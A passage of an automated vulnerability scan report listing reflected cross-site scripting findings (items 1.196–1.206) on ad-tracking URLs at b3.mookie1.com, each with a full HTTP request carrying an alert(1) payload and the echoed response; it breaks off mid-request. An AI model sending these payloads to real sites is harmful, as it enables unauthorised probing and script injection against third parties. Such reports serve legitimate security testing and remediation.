Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70690'-alert(1)-'36a38fb3c80 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work70690'-alert(1)-'36a38fb3c80&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
= new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work70690'-alert(1)-'36a38fb3c80&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.196. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 477bc'-alert(1)-'a401265b774 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis477bc'-alert(1)-'a401265b774&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2088
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis477bc'-alert(1)-'a401265b774&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.197. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5bb8'-alert(1)-'162fa22f555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers&b5bb8'-alert(1)-'162fa22f555=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2035
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers&b5bb8'-alert(1)-'162fa22f555=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.198. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5678'-alert(1)-'28fac782afa was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/peoplea5678'-alert(1)-'28fac782afa&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1997
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
al preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/peoplea5678'-alert(1)-'28fac782afa&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
v
...[SNIP]...

1.199. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e0c"><script>alert(1)</script>d290c6a9e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxise2e0c"><script>alert(1)</script>d290c6a9e7/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxise2e0c"><script>alert(1)</script>d290c6a9e7/1268218/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SRC
...[SNIP]...

1.200. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2bc"><script>alert(1)</script>31c70092ee9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1295663750@x54ad2bc"><script>alert(1)</script>31c70092ee9?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1301858921/x54ad2bc"><script>alert(1)</script>31c70092ee9/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.201. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80bf9'-alert(1)-'5a103aaca43 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People80bf9'-alert(1)-'5a103aaca43 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1997
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People80bf9'-alert(1)-'5a103aaca43';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.202. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cf9c'-alert(1)-'b908b68ff87 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=9cf9c'-alert(1)-'b908b68ff87&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1997
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
EO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=9cf9c'-alert(1)-'b908b68ff87&Section=People';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='
...[SNIP]...

1.203. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f76a'-alert(1)-'f0dd92b65ad was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis9f76a'-alert(1)-'f0dd92b65ad&_RM_HTML_referer_=&Section=People HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2053
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
es not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis9f76a'-alert(1)-'f0dd92b65ad&_RM_HTML_referer_=&Section=People';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section=''
...[SNIP]...

1.204. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295663750@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8cc'-alert(1)-'42687825ae9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295663750@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People&8a8cc'-alert(1)-'42687825ae9=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/people
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206404

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2000
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/people&_RM_HTML_title_=People%20-%20Xaxis&_RM_HTML_referer_=&Section=People&8a8cc'-alert(1)-'42687825ae9=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.205. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f17b'-alert(1)-'4fa911899ce was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions4f17b'-alert(1)-'4fa911899ce&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions4f17b'-alert(1)-'4fa911899ce&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction
...[SNIP]...

1.206. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de44a"><script>alert(1)</script>c65a5f2b13a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisde44a"><script>alert(1)</script>c65a5f2b13a/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
